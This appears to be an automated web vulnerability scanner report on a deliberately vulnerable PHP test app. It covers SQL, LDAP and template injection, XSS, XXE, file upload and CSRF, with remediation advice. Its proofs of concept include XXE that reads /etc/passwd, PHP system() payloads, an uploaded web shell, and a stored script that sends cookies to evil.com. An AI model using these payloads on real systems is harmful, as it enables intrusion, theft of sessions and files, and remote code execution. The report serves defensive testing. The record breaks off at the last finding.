Reflection @ offset 4014 — via sql-error-body:
…N SELECT 1,2,3,4,5--|%&#039;</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 SELECTs to the left and right of U…
Evidence (live response):
…EEP(5)--|&#039; UNION SELECT 1,2,3,4,5--|%&#039;</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 SELECTs to the left and right of UNION do not have the same number of result columns</p><form method='POST'>         <input name='username' placeholder='Username'>…
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
  • Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
  • For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
  • Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
  • Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php?page=sqli_second_order&view_user=1&search=%27%20OR%20…
' OR '1'='1
200 11ms sql-error-body SQLite
⚠ VULN GET ggsec_test_app.php?page=sqli_second_order&view_user=1&search=%27%20UNION…
' UNION SELECT 1,2,3,4,5--
200 67ms sql-error-body SQLite
GGC-XSS-8BC 5.4 MEDIUM P2 Confirmed XSS comment ?page=xss_stored 3/3 hits
Flow
$_POST['comment'] → stored via parameterized INSERT into comments table (safe store) → later fetched via SELECT → $row['comment'] → echo $row['comment'] without any htmlspecialchars. The stored taint is rendered raw into HTML on subsequent page loads. The sink is the echo, not the INSERT.
Attack Chain
Step 1: POST to ?page=xss_stored with comment=<script>alert(1)</script>&post_id=1&author=test. Step 2: GET ?page=xss_stored&post_id=1 to see the stored XSS rendered.
Impact
SESSION_THEFT — Chained
CWE / CVSS
CWE-79 Cross-site Scripting  ·  CVSS 5.4 Medium (Base 6.1 Medium)
Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
78%Medium confidenceEvidence score 78/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (stored-xss-post)
  • +3 Reproduced by 3 payload(s)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=xss_stored&post_id=1' --data 'post_id=1&author=test&comment=<img src=x onerror=alert(1)>'
Reflection @ offset 14839 — reflected UNENCODED (executes):
…</b>: ggsecfill</div><div class='comment'><b>ggsecfill</b>: post_id=1&author=test&comment=<img src=x onerror=alert(1)></div><form method='POST'> <input type='hidden' name…
Evidence (live response):
…b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: <script>document.location='http://evil.com/?c='+document.cookie</script></div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='co…
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
  • Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
  • Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
  • Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
GGC-XSS-91F 5.4 MEDIUM P2 Confirmed XSS author ?page=xss_stored 2/2 hits
Flow
$_POST['author'] → stored via parameterized INSERT into comments.author (safe store) → later fetched via SELECT → $row['author'] → echo "<b>" . $row['author'] . "</b>" without htmlspecialchars. Separate stored XSS vector from the 'comment' field.
Attack Chain
Step 1: POST to ?page=xss_stored with author=<script>alert(1)</script>&post_id=1&comment=test. Step 2: GET ?page=xss_stored&post_id=1 to see the stored XSS in the author field.
Impact
SESSION_THEFT — Chained
CWE / CVSS
CWE-79 Cross-site Scripting  ·  CVSS 5.4 Medium (Base 6.1 Medium)
Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
77%Medium confidenceEvidence score 77/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (stored-xss-post)
  • +2 Reproduced by 2 payload(s)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=xss_stored&post_id=1' --data 'post_id=1&author=<script>alert(1)</script>&comment=safe'
Reflection @ offset 14927 — reflected UNENCODED (executes):
…t=<img src=x onerror=alert(1)></div><div class='comment'><b>post_id=1&author=<script>alert(1)</script>&comment=safe</b>: ggsecfill</div><form method='POST'> <input typ…
Evidence (live response):
…b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: <script>document.location='http://evil.com/?c='+document.cookie</script></div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='co…
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
  • Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
  • Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
  • Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
GGC-XSS-775 5.4 MEDIUM P2 Confirmed XSS hash (location.hash) ?page=xss_dom 2/2 hits
Flow
DOM-based XSS: window.location.hash.substring(1) → decodeURIComponent() → document.getElementById('output').innerHTML = decoded. Purely client-side taint flow from URL fragment to innerHTML sink. Cannot be confirmed by HTTP-only DAST — requires headless browser verification.
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting  ·  CVSS 5.4 Medium (Base 6.1 Medium)
Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
77%Medium confidenceEvidence score 77/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (xss-reflection)
  • +2 Reproduced by 2 payload(s)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=xss_dom&hash%20%28location.hash%29=%23%3Csvg%20onload%3Dalert%28%27XSS%27%29%3E#<img src=x onerror=alert(1)>'
Evidence (live response):
…e></head>     <body>     <h2>DOM-based XSS</h2>     <div id="output"></div>     <script>         // PODATNOŚĆ: location.hash użyty bezpośrednio w innerHTML         // Taint flow: URL fragment → decodeURIComponent → innerHTML         var hash = window.location.hash.substring(1);…
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
  • Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
  • Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
  • Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php?page=xss_dom&hash%20%28location.hash%29=%23%3Cimg%20s…
#<img src=x onerror=alert('XSS')>
200 35ms xss-reflection
⚠ VULN GET ggsec_test_app.php?page=xss_dom&hash%20%28location.hash%29=%23%3Csvg%20o…
#<svg onload=alert('XSS')>
200 1ms xss-reflection
🔍 GGC-SSTI-6EC 9.8 CRITICAL P0 Confirmed SSTI content ?page=ssti 3/3 hits
Flow
Second-order SSTI: $_POST['content'] → stored via parameterized INSERT into posts.content (safe store) → later retrieved via SELECT on GET ?page=ssti&render=<id> → if template_engine='php', eval('?>' . $template) is called on the stored content. Full RCE via eval(). Requires two steps: store with engine=php, then render. Also a Twig simulation path echoes content directly (XSS-like, not true Twig eval).
Attack Chain
Step 1: POST ?page=ssti with title=test&content=<?php system('id'); ?>&engine=php to store. Step 2: GET ?page=ssti&render=<newId> to trigger eval() on the stored PHP content.
Impact
RCE — Chained
CWE / CVSS
CWE-1336 Server-Side Template Injection  ·  CVSS 9.8 Critical
Untrusted input reaches a server-side template engine, executing template expressions and often OS commands.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RC:C
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter
Initial Access, Execution
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
93%High confidenceEvidence score 93/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (ssti-rce-eval)
  • +15 Damning token in response ("uid=")
  • +3 Reproduced by 3 payload(s)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=ssti&render=348' --data 'RENDER:seed=ggsec{{7*7}}|store=/?page=ssti|storefield=content|render=/?page=ssti&render=NEWID|indicator=ggsec49|extra_fields=title:ggsectest,engine:twig'
Reflection @ offset 41 — via ssti-rce-eval:
<h2><b>ggsecSTORED7</b></h2>GGX457854a049uid=33(www-data) gid=33(www-data) groups=33(www-data) <form meth…
Evidence (live response):
<h2><b>ggsecSTORED7</b></h2>GGX457854a049uid=33(www-data) gid=33(www-data) groups=33(www-data) <form method='POST'>         <input name='title' placeholder='Title'>         <textarea name='content' placeholder='Content (try: {{7*7}} for Twig)'></textarea>         <select name='en…
Remediation
Never build templates from user input — pass user data as bound variables to a sandboxed engine.
  • Keep templates static; render user data through the engine's context/variables, never concatenate it into the template source.
  • Enable the engine's sandbox/auto-escape (e.g. Jinja2 SandboxedEnvironment, Twig sandbox) and disable dangerous tags/functions.
  • Validate/allowlist any value that must influence template selection.
Refs: CWE-1336 · OWASP: Server-Side Template Injection
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET (2nd-order) ggsec_test_app.php?page=ssti&render=346
RENDER:seed=<?php system('id'); ?>|store=/?page=ssti|storefield=content|render=/?page=ssti&render=NEWID|indicator=uid=|extra_fields=title:ggsectest,engine:php
200 165ms ssti-rce-eval
⚠ VULN GET (2nd-order) ggsec_test_app.php?page=ssti&render=347
RENDER:seed=<?php echo 'ggsec' . (7*7); ?>|store=/?page=ssti|storefield=content|render=/?page=ssti&render=NEWID|indicator=ggsec49|extra_fields=title:ggsectest,engine:php
200 53ms ssti-rce-eval
⚠ VULN GET (2nd-order) ggsec_test_app.php?page=ssti&render=348
RENDER:seed=ggsec{{7*7}}|store=/?page=ssti|storefield=content|render=/?page=ssti&render=NEWID|indicator=ggsec49|extra_fields=title:ggsectest,engine:twig
200 49ms ssti-rce-eval
📄 GGC-XXE-43C 7.5 HIGH P1 Confirmed XXE xml ?page=xxe 2/4 hits
Flow
$_POST body (getRawBody() or $_POST['xml']) → DOMDocument::loadXML($xmlData, LIBXML_NOENT | LIBXML_DTDLOAD). Both LIBXML_NOENT and LIBXML_DTDLOAD flags explicitly enable external entity expansion and DTD loading. libxml_disable_entity_loader(false) is called. The parsed result is echoed back via $doc->saveXML(), making this in-band XXE with full file read capability.
Impact
FILE_READ — Direct
CWE / CVSS
CWE-611 XML External Entity Reference  ·  CVSS 7.5 High
An XML parser resolves external entities, enabling local-file disclosure, SSRF, or denial of service.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RC:C
Compliance Impact
A05:2021 – Security Misconfiguration
PCI-DSS v4.0 Req 2.2.1 / 6.2.4  ·  ISO/IEC 27001:2022 A.8.9 / A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1083 File and Directory Discovery · T1005 Data from Local System
Discovery, Collection
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
92%High confidenceEvidence score 92/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (xxe-inband-reflection)
  • +15 Damning token in response ("root:x:0:0")
  • +2 Reproduced by 2 payload(s)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'http://localhost/ggsec_test_app.php?page=xxe' --data '<?xml version="1.0"?><!DOCTYPE ggsec [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><ggsec>&xxe;</ggsec>'
Reflection @ offset 265 — via xxe-inband-reflection:
…ggsec [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <ggsec>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbi…
Evidence (live response):
…n="1.0"?> <!DOCTYPE ggsec [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <ggsec>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:6…
Remediation
Disable external entity and DTD processing in the XML parser.
  • Disable entity loading/DTDs (e.g. libxml_disable_entity_loader, LIBXML_NONET, no LIBXML_NOENT/DTDLOAD).
  • Prefer a hardened parser configuration or a non-XML format (JSON) where possible.
Refs: CWE-611 · OWASP: XXE Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
✓ OK POST ggsec_test_app.php?page=xxe
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % x SYSTEM "{OOB_HTTP}"> %x;]><root/>
0 0ms
✓ OK POST ggsec_test_app.php?page=xxe
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "{OOB_HTTP}">]><root>&xxe;</root>
0 0ms
🔍 GGC-VULN-431 9.8 CRITICAL P0 Confirmed FILE_UPLOAD upload ?page=file_upload_rce 1/1 hits
Flow
$_FILES['upload'] → pathinfo() extension check against a whitelist that INCLUDES 'php', 'phtml', 'php5' → move_uploaded_file() to __DIR__ . '/uploads/' (web-accessible) with filename md5(uniqid()) . '_' . originalName. PHP files can be directly accessed and executed via /uploads/<hash>_<name>.php. Additionally, if auto_include=1, the uploaded file is immediately include()d. The extension whitelist explicitly allows PHP execution extensions.
Attack Chain
Upload a .php file, then access it at /uploads/<hash>_<filename>.php. Alternatively, set auto_include=1 in POST to trigger include() immediately.
Impact
RCE — Direct
CWE / CVSS
CWE-434 Unrestricted Upload of File with Dangerous Type  ·  CVSS 9.8 Critical
A file upload accepts dangerous types / trusts the client MIME, enabling a web shell and remote code execution.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RC:C
Compliance Impact
A04:2021 – Insecure Design
PCI-DSS v4.0 Req 6.2.4 (business-logic)  ·  ISO/IEC 27001:2022 A.8.28 / A.8.27  ·  GDPR Art. 25 + Art. 32 (data protection by design)
MITRE ATT&CK
T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter
Initial Access, Execution
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
96%High confidenceEvidence score 96/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (upload-rce)
  • +15 Damning token in response ("uid=")
  • +6 Expected indicator reflected
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'uploads/8a62ceac0d186ffa97e3727b1685f02f_ggsec_shell.php' --data 'upload:ggsec_shell.php'
Reflection @ offset 130 — via upload-rce:
…ec_test_app.php?page=file_upload_rce; GET executed it → 200 uid=33(www-data) gid=33(www-data) groups=33(www-data)
Evidence (live response):
…sec_shell.php to ggsec_test_app.php?page=file_upload_rce; GET executed it → 200 uid=33(www-data) gid=33(www-data) groups=33(www-data)
Remediation
Validate uploads by content (not just extension), store them outside the web root, and never execute them.
  • Allowlist by verified MIME/magic bytes AND extension; reject double extensions (shell.php.jpg) and PHP/.phtml/.htaccess.
  • Store uploads OUTSIDE the web root (or in a path with execution disabled: php_admin_flag engine off / no handler).
  • Generate a random server-side filename; never reuse the client-supplied name or path.
  • Serve downloads through a script with Content-Disposition: attachment, not by direct URL to the upload dir.
Refs: CWE-434 · OWASP: Unrestricted File Upload
ResultMethodURLPayloadStatusTimeDetectionDB
🔍 GGC-VULN-C5F 8.2 HIGH P1 Confirmed LDAP_INJECTION user ?page=ldap_injection 1/5 hits
Flow
$_GET['user'] → getParam('user') → $user → string concatenation into LDAP filter "(&(uid=$user)(userPassword=$pass))" without ldap_escape(). The application simulates LDAP authentication and explicitly detects injection metacharacters (* and )) to confirm bypass, echoing 'Auth bypassed! (LDAP injection)' when they appear.
Impact
AUTH_BYPASS — Direct
CWE / CVSS
CWE-90 LDAP Injection  ·  CVSS 8.2 High
Untrusted input alters an LDAP filter, allowing authentication bypass or directory data disclosure.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
96%High confidenceEvidence score 96/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (ldap-auth-bypass)
  • +15 Damning token in response ("uid=")
  • +6 Expected indicator reflected
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=ldap_injection'
Reflection @ offset 214 — via ldap-auth-bypass:
…er: (&amp;(uid=*)(userPassword=))</p><p style='color:green'>Auth bypassed! (LDAP injection)</p><form> <input name='user' plac…
Evidence (live response):
…t for a benign value) — filter/bind bypass. <h2>LDAP Auth</h2><p>Filter: (&amp;(uid=*)(userPassword=))</p><p style='color:green'>Auth bypassed! (LDAP injection)</p><form>         <input name='user' placeholder='Username'>         <input name='pass' type='password' placeholder='Pa…
Remediation
Escape LDAP special characters and use parameterized/allowlisted filters — never concatenate input into a filter.
  • Escape filter metacharacters ( ) * \ NUL per RFC 4515 (ldap_escape() / framework equivalent).
  • Build filters from a fixed template with bound values; allowlist attribute names.
  • Bind with least-privilege service accounts; never authenticate by substituting input into the bind DN/filter.
Refs: CWE-90 · OWASP: LDAP Injection Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php?page=ldap_injection
*
200 11ms ldap-auth-bypass
✓ OK GET ggsec_test_app.php?page=ldap_injection
*)(uid=*))(|(uid=*
0 0ms
✓ OK GET ggsec_test_app.php?page=ldap_injection
admin)(&)
0 0ms
✓ OK GET ggsec_test_app.php?page=ldap_injection
*)(&
0 0ms
✓ OK GET ggsec_test_app.php?page=ldap_injection
*)(uid=*))(&(uid=*
0 0ms
🔍 GGC-VULN-76D 7.4 HIGH Probable LDAP_INJECTION pass ?page=ldap_injection 0/3 hits
Flow
$_GET['pass'] → getParam('pass') → $pass → string concatenation into LDAP filter "(&(uid=$user)(userPassword=$pass))" without ldap_escape(). The password field is equally injectable in the LDAP filter string.
Impact
AUTH_BYPASS — Direct
CWE / CVSS
CWE-90 LDAP Injection  ·  CVSS 7.4 High (Base 8.2 High)
Untrusted input alters an LDAP filter, allowing authentication bypass or directory data disclosure.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:P/RC:R
ⓘ Base 8,2 → Effective 7,4 — probable (E:P/RC:R).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Probable  ·  🔓 Unauthenticated
Remediation
Escape LDAP special characters and use parameterized/allowlisted filters — never concatenate input into a filter.
  • Escape filter metacharacters ( ) * \ NUL per RFC 4515 (ldap_escape() / framework equivalent).
  • Build filters from a fixed template with bound values; allowlist attribute names.
  • Bind with least-privilege service accounts; never authenticate by substituting input into the bind DN/filter.
Refs: CWE-90 · OWASP: LDAP Injection Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
✓ OK GET ggsec_test_app.php?page=ldap_injection&user=admin
*)(&(uid=*
200 49ms
✓ OK GET ggsec_test_app.php?page=ldap_injection&user=admin
pass))(|(uid=*
0 0ms
✓ OK GET ggsec_test_app.php?page=ldap_injection&user=admin
*)(uid=*))(|(uid=*
0 0ms
🔍 GGC-VULN-AF8 5.5 MEDIUM Potential PROTOTYPE_POLLUTION JSON body (__proto__/constructor) ?page=prototype_pollution 0/2 hits
Flow
Raw JSON request body → getRawBody() → json_decode($json, true) → $data echoed back as JSON. The PHP endpoint detects __proto__/constructor.prototype keys and prints a warning. This is environment-dependent: requires a downstream Node.js merge (Object.assign/lodash.merge/$.extend); the PHP endpoint only relays JSON. The PHP layer itself does not perform object prototype assignment.
Attack Chain
PHP endpoint accepts and echoes JSON containing __proto__ keys. If this JSON is forwarded to a Node.js service that performs a recursive merge, prototype pollution occurs on the Node side.
Impact
INFORMATION_DISCLOSURE — Conditional
CWE / CVSS
CWE-1321 Prototype Pollution (JS Object.prototype)  ·  CVSS 5.5 Medium (Base 6.5 Medium)
Attacker-controlled keys pollute Object.prototype in a Node app, corrupting later logic (DoS, auth bypass, RCE).
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N/E:U/RC:U
ⓘ Base 6,5 → Effective 5,5 — potential (E:U/RC:U).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter
Initial Access, Execution
Certainty / Access
Potential  ·  🔓 Unauthenticated
Remediation
Block __proto__/constructor/prototype keys in merges and use null-prototype or Map for untrusted data.
  • Reject or strip keys named __proto__, constructor, prototype before any recursive merge/assign.
  • Use Object.create(null) or a Map for objects built from user input; avoid deep-merge of untrusted JSON.
  • Upgrade/patch merge utilities (old lodash.merge, deep-extend, etc.) to versions with proto guards.
  • Freeze Object.prototype (Object.freeze) where feasible and validate input against a schema.
Refs: CWE-1321 · OWASP: Prototype Pollution
ResultMethodURLPayloadStatusTimeDetectionDB
✓ OK POST+GET (proto-pollution) /merge
JSONBODY:{"__proto__":{"isAdmin":true}}
200 8ms
✓ OK POST+GET (proto-pollution) /merge
JSONBODY:{"constructor":{"prototype":{"isAdmin":true}}}
200 3ms
🎭 GGC-CSRF-39C 8.1 HIGH P1 Confirmed CSRF username ?page=sqli_second_order (registration form) 1/1 hits
Flow
The POST form at ?page=sqli_second_order registers a new user (INSERT INTO users) without any CSRF token. The form has no hidden _token/_csrf/nonce field. An attacker can craft a cross-site form submission to register arbitrary users.
Attack Chain
Attacker hosts a page with auto-submitting form targeting ?page=sqli_second_order with POST username=attacker&email=evil@test.com
Impact
PRIV_ESC — Direct
CWE / CVSS
CWE-352 Cross-Site Request Forgery  ·  CVSS 8.1 High
A state-changing action lacks an anti-forgery token, so a malicious site can perform it as a logged-in victim.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:H/RC:C
Compliance Impact
A01:2021 – Broken Access Control
PCI-DSS v4.0 Req 6.2.4 / 7.2.1  ·  ISO/IEC 27001:2022 A.8.3 / A.5.15  ·  GDPR Art. 5(1)(f) + Art. 32 (confidentiality)
MITRE ATT&CK
T1539 Steal Web Session Cookie
Credential Access
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
96%High confidenceEvidence score 96/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (csrf-no-token)
  • +15 Damning token in response ("SQLSTATE")
  • +6 Expected indicator reflected
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=sqli_second_order' --data 'username=csrf_test_user&email=csrf@test.com'
Reflection @ offset 3 — via csrf-no-token:
<p>User registered! ID: 68</p><p>Related posts query: SELECT * FROM posts WHERE…
Evidence (live response):
…EEP(5)--|&#039; UNION SELECT 1,2,3,4,5--|%&#039;</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 SELECTs to the left and right of UNION do not have the same number of result columns</p><form method='POST'>         <input name='username' placeholder='Username'>…
Remediation
Require an anti-CSRF token on state-changing requests and use SameSite cookies.
  • Add per-session/per-request CSRF tokens to all state-changing forms and verify them server-side.
  • Set SameSite=Lax/Strict on session cookies; verify Origin/Referer for sensitive actions.
  • Never perform state changes via GET.
Refs: CWE-352 · OWASP: CSRF Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN POST ggsec_test_app.php?page=sqli_second_order
username=csrf_test_user&email=csrf@test.com
200 15ms csrf-no-token SQLite
🎭 GGC-CSRF-188 8.1 HIGH P1 Confirmed CSRF comment ?page=xss_stored (comment form) 1/1 hits
Flow
The POST form at ?page=xss_stored inserts a comment into the database without any CSRF token. No hidden _token/_csrf/nonce field. An attacker can forge cross-site comment submissions.
Attack Chain
Attacker hosts a page with auto-submitting form targeting ?page=xss_stored with POST post_id=1&author=attacker&comment=spam
Impact
PRIV_ESC — Direct
CWE / CVSS
CWE-352 Cross-Site Request Forgery  ·  CVSS 8.1 High
A state-changing action lacks an anti-forgery token, so a malicious site can perform it as a logged-in victim.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:H/RC:C
Compliance Impact
A01:2021 – Broken Access Control
PCI-DSS v4.0 Req 6.2.4 / 7.2.1  ·  ISO/IEC 27001:2022 A.8.3 / A.5.15  ·  GDPR Art. 5(1)(f) + Art. 32 (confidentiality)
MITRE ATT&CK
T1539 Steal Web Session Cookie
Credential Access
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (csrf-no-token)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=xss_stored' --data 'post_id=1&author=csrftest&comment=csrf_injected_comment'
Evidence (live response):
…b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: <script>document.location='http://evil.com/?c='+document.cookie</script></div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='co…
Remediation
Require an anti-CSRF token on state-changing requests and use SameSite cookies.
  • Add per-session/per-request CSRF tokens to all state-changing forms and verify them server-side.
  • Set SameSite=Lax/Strict on session cookies; verify Origin/Referer for sensitive actions.
  • Never perform state changes via GET.
Refs: CWE-352 · OWASP: CSRF Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN POST ggsec_test_app.php?page=xss_stored
post_id=1&author=csrftest&comment=csrf_injected_comment
200 19ms csrf-no-token
🎭 GGC-CSRF-72B 7.3 HIGH P1 Confirmed CSRF content ?page=ssti (post creation form) 1/1 hits
Flow
The POST form at ?page=ssti creates a new post with a user-specified template engine (including 'php' which triggers eval) without any CSRF token. An attacker can forge a post creation with engine=php to achieve RCE via CSRF.
Attack Chain
Attacker hosts a page with auto-submitting form targeting ?page=ssti with POST title=evil&content=<?php system('id'); ?>&engine=php. When an admin later renders it, eval() executes the payload.
Impact
RCE — Direct
CWE / CVSS
CWE-352 Cross-Site Request Forgery  ·  CVSS 7.3 High (Base 8.1 High)
A state-changing action lacks an anti-forgery token, so a malicious site can perform it as a logged-in victim.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N/E:H/RC:C
ⓘ Base 8,1 → Effective 7,3 — auth-gated (PR:L).
Compliance Impact
A01:2021 – Broken Access Control
PCI-DSS v4.0 Req 6.2.4 / 7.2.1  ·  ISO/IEC 27001:2022 A.8.3 / A.5.15  ·  GDPR Art. 5(1)(f) + Art. 32 (confidentiality)
MITRE ATT&CK
T1539 Steal Web Session Cookie
Credential Access
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (csrf-no-token)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=ssti' --data 'title=csrftest&content=csrfpayload&engine=php'
Evidence (live response):
